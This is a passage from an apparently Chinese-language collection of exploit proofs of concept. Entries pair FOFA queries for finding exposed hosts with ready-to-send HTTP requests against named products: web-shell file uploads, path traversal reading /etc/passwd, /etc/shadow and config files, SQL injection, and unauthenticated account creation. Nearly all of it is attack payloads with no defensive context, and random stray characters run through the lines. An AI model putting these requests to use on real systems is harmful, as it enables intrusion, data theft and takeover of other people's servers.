$ C( }6 J z# @; ^
<?xml version="1.0" encoding="utf-8"?>
: D( X9 Q# o* j4 a1 D V4 `<soap:Envelope xmlns:xsi="
5 s* @7 Z) z/ Whttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"# ^5 p/ }7 `: ^" W
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">- \* d( Z! t: s
<soap:Body>8 F( K; d( P$ j+ g$ _" J
<UploadResume xmlns="http://tempuri.org/">
8 P2 F/ T: S; F5 }<ip>1</ip>' v' S0 l& Q) U7 q
<fileName>../../../../dizxdell.aspx</fileName>) p8 @7 {9 o9 \- E$ w' u
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>/ c+ q0 A/ g+ E0 F& @- Y
<tag>3</tag>
& d, @, J. j: `& _9 K4 J: ]</UploadResume>% d$ p: D- Y! b+ n6 _
</soap:Body>9 z8 ]6 H: Z* x' X I( K. x; d
</soap:Envelope>
' b/ m1 K- P8 _6 I w- L9 z, P. _/ i) ~, l
& t3 N% Q" f# h5 M" {5 q
http://x.x.x.x/dizxdell.aspx
' W/ p( S" s: s# E# L
6 \ k2 v7 O i- e/ l- f; ]162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
, }) [) ]/ y# K! AFOFA: app="和丰山海-数字标牌"
+ @! A+ r; u* s5 vPOST /QH.aspx HTTP/1.1
% h- M, K# n- `# _& ^# OHost: x.x.x.x' C4 e, d8 h" y8 c* y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0+ s4 D' P' S% }. y8 U9 a. J
Connection: close# a8 k4 \; Q& _4 P* a0 G
Content-Length: 583" A# ^& [# ~" h0 {
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
7 `) N$ P' g- i WAccept-Encoding: gzip
* {9 q, D$ e+ E1 m3 v* d+ h8 J% Y5 V" u8 t6 s& R2 d# o
------WebKitFormBoundaryeegvclmyurlotuey, o; C4 {7 [7 q1 A% m C5 m& i
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"5 L4 m, c1 |( E& \
Content-Type: application/octet-stream7 l/ B( f1 _0 f0 d1 m
$ H7 s, j2 R" v7 ~6 U5 i. B<% response.write("ujidwqfuuqjalgkvrpqy") %>
* [! z0 Y1 v, @' }+ G0 M------WebKitFormBoundaryeegvclmyurlotuey: H3 C, \6 g" M4 n9 ~
Content-Disposition: form-data; name="action"
1 F9 f; W$ B' G; O
/ L. [5 J' w1 N# c( |( ]upload
. t# B# z- V/ ~: w1 B* Y9 Z2 N------WebKitFormBoundaryeegvclmyurlotuey- X/ E) m4 ~# _3 w, Q4 ?6 {
Content-Disposition: form-data; name="responderId": {' ^3 c6 M5 B+ F& O: l& L
( }! W/ d2 Z- ^" h) [5 @: c
ResourceNewResponder5 W0 K' w' K- O
------WebKitFormBoundaryeegvclmyurlotuey; I' Y1 A. T3 _- @% M& @' L
Content-Disposition: form-data; name="remotePath"
+ i7 D5 ]% ?2 R4 {: b. L( ?+ I3 @8 M3 @- ]# {
/opt/resources1 W: `/ Z( U6 W) a# E3 G Z. ]" ^' w
------WebKitFormBoundaryeegvclmyurlotuey--
7 s8 Z8 z/ U2 ~" U
* b" b/ E6 e( ]8 I# y3 }
h, Y3 a; x1 Lhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx/ ?" L0 a( f; N6 ^- X
' G1 y. s" v3 r6 g2 o163. 号卡极团分销管理系统 ue_serve.php 任意文件上传) ]( H8 q' @) l. a
FOFA: icon_hash="-795291075"
; ^2 @7 T4 p2 v0 dPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
3 W, p+ {9 O! r* J' m1 uHost: x.x.x.x$ ~& m# T# O' \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36. y( B2 ]* }/ y+ i1 u9 M
Connection: close3 k* W+ N5 N! n" i4 Y" O$ f# u9 q, f
Content-Length: 293
! o" j j+ q# C# v- CAccept: */*" h. u6 Y$ [) L8 d
Accept-Encoding: gzip, deflate% P) p7 _( u. \
Accept-Language: zh-CN,zh;q=0.9
$ _0 Q# x% d6 {& y6 \Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
* D1 g/ R0 S( @# F$ P2 v
( V, O" Z6 U, [( D- @& x: R. E------iiqvnofupvhdyrcoqyuujyetjvqgocod. b# F$ h j: b4 Y. y
Content-Disposition: form-data; name="name"
: v0 j8 ]2 V, |% j+ r( G
6 |. u- |) t0 _/ y5 Y1.php+ W( B8 u4 ]" k
------iiqvnofupvhdyrcoqyuujyetjvqgocod
5 D2 b# T/ z; k' ^6 dContent-Disposition: form-data; name="upfile"; filename="1.php"
+ f5 F6 _0 [' S+ DContent-Type: image/jpeg6 V6 U; @% e5 S4 G6 } o4 D3 \
* v8 J. \( f }6 g' H) |3 q# i- |
rvjhvbhwwuooyiioxega( ^# K9 V) V) t/ V
------iiqvnofupvhdyrcoqyuujyetjvqgocod--9 A4 Y Y4 [5 I% |- P1 a
8 ?# x0 l6 c" v% }
8 L- X) K' ]( j
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传6 g- k3 S" E& I" V7 `" z
FOFA: title="智慧综合管理平台登入"+ O. E; p5 Y6 y ]
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
- f+ D, q" O; i" s9 U/ b7 VHost: x.x.x.x/ r# H" B; q! }" v6 s% i3 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
" r1 w& v/ f0 B% P" @/ PContent-Length: 288/ }5 i6 u0 g) a* \6 V6 r
Accept: application/json, text/javascript, */*; q=0.01- [4 U) F7 Q0 r i0 e, A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,) j9 G! P9 R/ v+ r) I
Connection: close' f6 j! ]6 A8 X4 v( n3 |# ?* [7 ?
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
; y8 j; c- c" yX-Requested-With: XMLHttpRequest
4 F7 H6 ^' s: o" P; }Accept-Encoding: gzip! a( i8 v; [. V! t, \% p. Z% X
/ L# r7 |4 Z9 H. l
------dqdaieopnozbkapjacdbdthlvtlyl
) j1 A$ `/ ]; ?8 K) Y0 TContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"* z/ H+ M) G$ c5 T& u/ z$ M! {* R! R
Content-Type: image/jpeg3 i* F& ~6 S0 [; C
% d: Q1 `4 Y" I5 F. Q7 v" a<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
4 | v9 R+ x7 q, Z3 u# m6 `8 I; F6 f------dqdaieopnozbkapjacdbdthlvtlyl--
3 k1 K9 W, {4 Z0 ^- ]) R
0 [& O1 Z" Y) e! y- e
+ R' f" N! F& E; \8 {' a* s4 yhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx; c9 y4 |4 g+ t5 G4 A: Y5 {1 e @, S# ^
" q5 o! H0 J0 ` X$ I7 M! W165. OrangeHRM 3.3.3 SQL 注入7 b; C! R. f7 r3 j
CVE-2024-36428
6 W' c# r: \, D ?6 D2 E5 PFOFA: app="OrangeHRM-产品"
, g0 Q$ S8 j" Y; ?. Q7 E- Z- ZURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))% O8 r9 F, I7 T
: W2 v4 {& d" Q
0 e9 y! L( y5 A3 J( O. X( B6 h166. 中成科信票务管理平台SeatMapHandler SQL注入
+ k$ O- A( j% q! R" DFOFA:body="技术支持:北京中成科信科技发展有限公司"
& e, }6 ^: e/ a6 g! VPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1, [8 R+ q7 T% Y) b! H
Host:5 r& ]9 @: ~- W7 ^: f
Pragma: no-cache+ j+ g/ |# k/ a/ g6 D+ N7 }
Cache-Control: no-cache) W' D6 d5 R! M" m0 o3 p) e% @/ \
Upgrade-Insecure-Requests: 1; p" S3 ~" c% Y& z! y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36/ t) k' M! f: e! g* [ b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- P% V1 L0 f3 g" dAccept-Encoding: gzip, deflate4 h- h% G! Q" P4 k/ _1 ~
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
! L# x" a. _" F+ ^1 o- i+ WCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE+ S$ V4 ^6 @: M0 F/ j8 ^
Connection: close
# I+ F$ x/ Q9 U( _0 t3 K7 wContent-Type: application/x-www-form-urlencoded" e6 @& `: S+ U+ a- Y
Content-Length: 899 y9 m/ L5 S2 F
3 J& g/ R: {7 e1 R# U
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
4 F; b1 w4 e7 ?, X0 w/ f2 e5 Y' R6 z8 E2 c
" ?3 q) Y+ t, L4 D
167. 精益价值管理系统 DownLoad.aspx任意文件读取
" }6 @1 m# U3 s4 FFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
! [1 N8 @7 ?7 \, \3 K/ g4 gGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
2 G7 l- t: Z# \Host:/ [. [+ q1 Y4 |. a( J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ @, h% R( Y$ C* [% ^7 }1 FContent-Type: application/x-www-form-urlencoded
/ E9 a' b; d1 r. K: }6 V! ?Accept-Encoding: gzip, deflate# J3 X+ T& n8 _2 n: ]& q
Accept: */*; M+ c# y6 z0 S0 t6 |
Connection: keep-alive
- A; p9 _- ]$ H1 f0 l
2 M" T9 k/ S6 P/ U9 W! M& _ h' Y) f4 A* [7 e' A4 ?
168. 宏景EHR OutputCode 任意文件读取8 `- W" C& q' B+ [
FOFA:app="HJSOFT-HCM"
8 }2 @5 |7 f; ^% l8 L/ w b3 @GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
3 N* O5 v9 I3 @8 l1 I2 u5 IHost: your-ip* C D6 q6 B7 t% d1 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36+ |: ~) ^) y5 n5 \- v; `+ ^
Content-Type: application/x-www-form-urlencoded
' l5 u1 U! q$ U- P: zConnection: close2 ]# \4 w5 z. y1 t# T5 l
, m3 c0 r7 r) b( K. T9 s- s+ e
0 {/ w ^( w7 s; b: W
! w( O2 [( ?2 M! A1 w P% e
169. 宏景EHR downlawbase SQL注入
! A- o! q' m2 x+ \: o7 _FOFA:app="HJSOFT-HCM"8 ]4 F+ T: p. n1 W, z
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1+ x+ B) O" b! I2 n6 e
Host: your-ip+ P, U- S& T. V; L+ k3 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! G! D: r$ A* r2 g; o
Accept: */*
* y4 v1 o3 g' v2 o HAccept-Encoding: gzip, deflate
: u1 T* w: ?0 E8 \/ e" ~) U5 \Connection: close# q* W" f+ z6 p7 a, M) V- \7 P5 j5 B
/ v. t( O8 U! x0 H! n8 e
: P$ v0 J; ^3 N" r Q9 D7 k! i* O5 t. Q1 f( J$ Q% ^9 `% E0 @9 z J6 ?* L
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
" A+ ?, k7 A! p8 `" gFOFA:body="/general/sys/hjaxmanage.js"
- `" r# u3 J+ c, a1 D/ X7 TPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
4 W/ T; r. q1 l1 S- e, AHost: balalanengliang5 ^9 n! w, ^9 g- E% _1 ^- I$ ]
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& {! _, _! G" l, y
Content-Type: application/x-www-form-urlencoded& q5 B* L+ m$ J% \/ t! f
! j7 N: w& {3 W8 p8 Q1 p
filename=../webapps/ROOT/WEB-INF/web.xml8 j( n. x# l. l* Y
+ c0 x3 m# q; L" ]# w, j- Q
7 O* \. Y$ u/ {7 s1 d
171. 通天星CMSV6车载定位监控平台 SQL注入1 ?9 q+ Z, }5 h# K, e# v! ?+ z
FOFA:body="/808gps/"
% n7 e0 [8 i' @( ~6 v4 f7 k7 JGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1. X# U7 s9 s- R4 ?
Host: your-ip) D! p! [/ f; F9 E1 {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0& F1 V$ D! F8 G4 q
Accept: */*
2 i/ C( ?& C( b/ o" ]6 eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# T% ?: X2 F: U2 x3 Y- X$ V O4 k
Accept-Encoding: gzip, deflate. B3 E. T: X; l3 a" K; s) y
Connection: close( Y9 `9 B) V2 X1 u: s) j* i
/ k0 ]9 N1 e" k4 y
7 q; T$ E: @5 x4 _+ \
5 K. Q0 q, ?- M172. DT-高清车牌识别摄像机任意文件读取8 h3 F3 b- S5 F3 ]/ b8 }' ]! J. j, K3 u
FOFA:app="DT-高清车牌识别摄像机"0 t+ B$ M4 H/ f
GET /../../../../etc/passwd HTTP/1.1
1 s9 h8 i+ @# q" sHost: your-ip" j# k/ \% Y+ ]0 W, m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 g0 I: Y3 k( J1 F
Accept-Encoding: gzip, deflate
5 M& A8 o& ~. Z' a+ f8 UAccept: */** D9 J4 e& D5 P9 ^
Connection: keep-alive% b) J4 M c: p1 ?
3 @ o# C, x r, q6 u8 X) H
( ]$ }4 [9 j* S5 ], p% `
, O9 \0 f) G! p+ ]" e2 G6 U+ A173. Check Point 安全网关任意文件读取3 A, B* n# i- n" C9 ^# I' N9 Y
CVE-2024-249197 I* p4 D6 U i3 I; E4 F* E
FOFA:app="Check_Point-SSL-Network-Extender"! X* X8 h5 s' Z. }! x8 v9 p
POST /clients/MyCRL HTTP/1.1 @& W& X9 X" G6 o8 e/ x6 l' E
Host: your-ip; [& Z( P2 t7 J# J
Content-Type: application/x-www-form-urlencoded( m$ \6 p9 Q# P! U
5 T. v5 M) ]. |4 G9 s' e
aCSHELL/../../../../../../../etc/shadow+ L3 f4 l% B/ `" j
$ f1 { l" r9 @7 U5 S+ J% u
+ C( R, t) W- H o! s# Z6 w9 z
4 J2 }* O) {( C' D174. 金和OA C6 FileDownLoad.aspx 任意文件读取 n4 b3 |" a9 N( k- w
FOFA:app="金和网络-金和OA"! b* E1 b3 J( c, Z( C
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
/ j5 {8 I2 C6 oHost: your-ip
5 `, A0 T; R$ B- sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' c! d; M, I+ t3 ~$ i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 d! d6 H- {: ]0 N. bAccept-Encoding: gzip, deflate, br
" d* }" p4 x$ \0 K6 k- t4 AAccept-Language: zh-CN,zh;q=0.9
2 a y) E9 j, O7 p6 wConnection: close
: R% T7 U0 q' U) T& l
8 C/ P% p% S$ j5 u8 m% }1 x2 Q% \( A* [" S% S j: A$ o" Q
" E1 D/ t! ^# k6 p+ h& [175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入/ {" P5 ?' o5 z$ ]; r
FOFA:app="金和网络-金和OA"; T' A# g2 e8 T4 w
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1, o1 H3 Z! }# n" w' h
Host:
( `8 W' |( `* h0 i G! R* @# VUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36& P! W# |+ M8 d6 L7 R" }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, ]7 f8 w g/ N% Q/ g% d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 n0 s7 G- E7 i6 b" P0 T. Q
Accept-Encoding: gzip, deflate
" P1 C& ~# C+ {; n3 w _& E; eConnection: close
4 v0 G( e* g/ @7 D4 oUpgrade-Insecure-Requests: 1
" J7 D9 @7 V. C8 y1 Q% F0 w; p
- f8 N; Y0 c0 Z' I$ W+ X% W7 ]. d1 i+ `
176. 电信网关配置管理系统 rewrite.php 文件上传9 a7 g1 `9 W: s3 V) p
FOFA:body="img/login_bg3.png" && body="系统登录"
3 v9 k0 o; O$ y. D" sPOST /manager/teletext/material/rewrite.php HTTP/1.1
' |# d4 d6 s8 `) O- K: c# cHost: your-ip/ F# [$ e* i: O' R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0- a% L6 c# R) T$ s: U8 P! I. |, {( h
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
2 r1 s+ S# w' K9 Q1 JConnection: close# F: u0 l1 r. E# T( T
& `6 A3 O, |+ d3 o9 U9 @! p3 d------WebKitFormBoundaryOKldnDPT
2 s- Y/ M4 i4 R) y/ l J$ ~) Q% C' bContent-Disposition: form-data; name="tmp_name"; filename="test.php" j, y' _" o8 A! Z! G2 T2 _
Content-Type: image/png
" r& f4 ~0 O$ P; U 5 c( @( I F6 h8 L* }' w5 v
<?php system("cat /etc/passwd");unlink(__FILE__);?>4 r( B9 i2 z3 J/ W( r* o& Y
------WebKitFormBoundaryOKldnDPT
$ m- q# k6 d# ^8 ]! mContent-Disposition: form-data; name="uploadtime"
" F& ?1 }; D* d2 b3 N
# n( C% q. {% m' b: Z
( Y! R% r# l! l. K" L n------WebKitFormBoundaryOKldnDPT--# R( }1 [" H' }4 z) W; {5 i* g
+ L/ R4 V/ u. B% h$ ?
2 s5 q2 o6 X" u4 z* O3 G. g M& U9 |+ s2 N: w7 u
177. H3C路由器敏感信息泄露
1 O& E! v1 V* T! f3 c/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
. c$ i+ u& T: b0 f6 K( ?7 Q/userLogin.asp/../actionpolicy_status/../M60.cfg
: D7 }2 R) L" t" x( L( r/userLogin.asp/../actionpolicy_status/../GR8300.cfg
) v0 I# X- P' n4 }! k0 M7 r/userLogin.asp/../actionpolicy_status/../GR5200.cfg- z0 Z) @! J- ?/ W
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
9 Z: b m0 }' M) z& N/userLogin.asp/../actionpolicy_status/../GR2200.cfg
5 r. i2 R% _' Y2 W# ~/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg; r: P/ r- B( v4 D; r# [
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg$ y- M5 s {/ E; I5 a5 r
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg1 k( k/ k5 q8 x+ z
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
( G" K$ s3 ~) @8 \8 ~: m; m/userLogin.asp/../actionpolicy_status/../ER5200.cfg" l4 C1 H: L- }( ]6 t) ~5 I M+ f
/userLogin.asp/../actionpolicy_status/../ER5100.cfg/ }7 S0 A" `2 V4 B0 v
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg( s0 U4 f$ \+ `! j- o3 q8 D
/userLogin.asp/../actionpolicy_status/../ER3260.cfg G) `0 z- b" w/ q0 Q2 ^7 v& }8 c- k
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
0 k9 w) r! }6 G8 T4 h/userLogin.asp/../actionpolicy_status/../ER3200.cfg
B5 z2 M' @0 R q! r/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
# ?' j, b3 D. V3 g# l+ n/userLogin.asp/../actionpolicy_status/../ER3108G.cfg+ k) {2 q; M: x4 s T% [
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
$ ]. j- X0 K7 b7 J: l/userLogin.asp/../actionpolicy_status/../ER3100.cfg+ Y# A5 }7 d6 n# K8 j. ~
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
* W: {; y! v9 G4 i
3 \5 Q" a5 L5 W: H! H
9 Q% N6 g& @& d# m1 j( l; \178. H3C校园网自助服务系统-flexfileupload-任意文件上传5 x9 ]$ P( H" h: C5 X7 M) c3 f
FOFA:header="/selfservice"; t: ^' F( B1 G/ T2 {7 G. d4 {
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.12 y. {$ m* I& e& z' i, D
Host:9 c8 r# I+ s# J& l; b% j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
: ?' ^% |7 Q8 r, p2 R' ~Content-Length: 252
5 M. t' ]( g' Y6 l9 CAccept-Encoding: gzip, deflate @1 M Q4 n8 H0 B6 |4 R
Connection: close2 h3 k) m( X+ s
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
6 r7 }1 ~1 ^6 c# \4 ]0 N# Q) ?-----------------aqutkea7vvanpqy3rh2l; c! H; V; a) f3 b& h' |5 v
Content-Disposition: form-data; name="12234.txt"; filename="12234"
$ m6 |; n) t7 |0 @3 QContent-Type: application/octet-stream, A& ~7 `. [: G/ X4 j7 p! W7 G
Content-Length: 255
# C) D h; S7 d3 S" f( ]/ L
+ V3 p4 T; M* s' y( O/ H) s. J12234
! ^$ w/ s5 s# h-----------------aqutkea7vvanpqy3rh2l--
p; ~1 E/ q w" Y
9 P7 w) A5 Q3 o# Z/ i/ [$ B! v, c% g, Y" m6 U7 _. d8 S- ?
GET /imc/primepush/%2e%2e/flex/12234.txt
- X% j& s* n7 Z! @2 x$ D# G2 I. E v+ j: U
" k6 |$ w$ N" i
179. 建文工程管理系统存在任意文件读取
' i( V5 |4 L6 X5 ]6 mPOST /Common/DownLoad2.aspx HTTP/1.1
6 f* f8 C7 r6 S$ v X% xHost: {{Hostname}}; ?) q. @0 ]+ {2 r3 O
Content-Type: application/x-www-form-urlencoded/ E# n9 U3 c1 x5 O) o. k2 w
User-Agent: Mozilla/5.0* I$ T6 z% t0 ^5 ]9 C9 {) k3 [
6 A* e, Y$ s) F5 U, l9 U2 E; G! o! q
path=../log4net.config&Name=% T% K4 @9 d* c# h
. g: j6 m* i4 U; I( P) f5 ?# @' m: M c ~# v& m- V9 @
180. 帮管客 CRM jiliyu SQL注入
! i" u1 P. | Z2 HFOFA:app="帮管客-CRM"
: u: H* M* ]4 m; n, ]( P! O: f. }GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.11 Y+ W5 m% _ T8 E
Host: your-ip
- V& I& } E2 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 P1 O' f( q* q) A( k! dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& {% W: V3 Q% \" N6 EAccept-Encoding: gzip, deflate! @$ v1 [5 _* j; T8 ~& {
Accept-Language: zh-CN,zh;q=0.9
) O" Y% J, h0 F) Z( hConnection: close4 X6 M+ l) k6 B" e+ {
& S- l ~) ?$ W0 i/ C1 z0 }
' t/ H& q+ H+ N' [3 @ T181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
7 G' i. S+ R, qFOFA:"PDCA/js/_publicCom.js"
7 @8 W9 L: D2 K& nPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
' q4 d4 O7 J- c% W! @$ b3 MHost: your-ip
( @ f% ^: K' H% L6 M: N* i* hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36) E' O* u! ~' k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 Y' @ V( q% i# _% Y6 q# k) E- }- iAccept-Encoding: gzip, deflate, br! B8 @. T9 a8 c2 |% z2 W% m- e
Accept-Language: zh-CN,zh;q=0.9
5 W ]7 X' N7 c2 O4 LConnection: close
- M; U0 g+ e) }Content-Type: application/x-www-form-urlencoded
# W; @4 M: t2 ?8 ?, t/ n8 c3 n( q M( f, @8 w/ v" m
' }6 X& f, `% W# eaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20# X3 a( S# q( F" G7 b: D
$ X% N5 p1 J" N B. p
; U* a/ @" ]. V4 c# Y
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建0 O3 ^! j( B: i. W3 {) V
FOFA:"PDCA/js/_publicCom.js"
; w, Z7 k% `: |( y( D& J' SPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
. m e* B, d1 ]9 e7 KHost: your-ip
* Z! A G% u6 d4 t. FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36* b$ W' A% C$ ?* S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 r. D4 `; f& f. M
Accept-Encoding: gzip, deflate, br1 |$ R) \' s/ H* x G+ M
Accept-Language: zh-CN,zh;q=0.9
4 \1 b4 |: r) W6 U+ rConnection: close# H1 l$ ~9 @( J( S
Content-Type: application/x-www-form-urlencoded
& T. q. M4 K- v$ O1 l# D- p4 g6 v: O, e1 l
3 ?4 n. |$ D) X6 M
username=test1234&pwd=test1234&savedays=1! q/ \9 _& r' J" J
) p |7 D7 q" r7 n$ e5 ?( b- G( O
/ Q* N& I, |! {- a; t
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入( a( s- N" [7 R( Z; s4 X+ @
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"/ K, N) A- I" f" W S3 r. i, p
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
& P" g# @, _0 g! XHost: your-ip
! z5 A {+ e4 |1 D; ]& ]9 TUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 e$ p. ^: o0 |5 f
Accept-Charset: utf-8 {8 e& q; B. m. F* i% |
Accept-Encoding: gzip, deflate5 P# U: N; o' J
Connection: close$ {7 ]6 y- J5 v% |, P
/ Q! Q+ {9 ~; B. X! x; F Y0 a/ g5 u+ d
( y7 Z1 D" Y8 `: a8 z184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加6 X' U3 u3 L, P8 h
FOFA:server="SunFull-Webs"
v4 v Q3 v; `4 f% nPOST /soap/AddUser HTTP/1.13 X5 x( H7 I; ~6 A& G
Host: your-ip! h9 G& ^" T* @: M o+ x
Accept-Encoding: gzip, deflate7 H2 v; x; W$ \1 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
- P! {) T) a: z$ ^Accept: application/xml, text/xml, */*; q=0.01, v* ]" h# F: j M) P
Content-Type: text/xml; charset=utf-8
* A; w# U F3 {- t! N, R: [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# ~3 X) D9 ~. n3 E! c
X-Requested-With: XMLHttpRequest* l0 l: z \: S- s, q) N' h
